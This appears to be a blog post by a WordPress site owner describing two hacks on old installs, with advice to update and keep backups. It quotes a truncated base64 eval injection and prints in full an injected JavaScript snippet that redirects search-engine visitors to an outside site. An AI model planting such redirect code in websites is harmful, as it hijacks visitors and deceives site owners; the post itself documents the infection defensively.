Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.
1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.
On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run it's hack all the way through. My guess is it's probably some kind of redirect.
2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.
The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:
<script> var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length). split("&"); </script>
We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!
I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.
So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.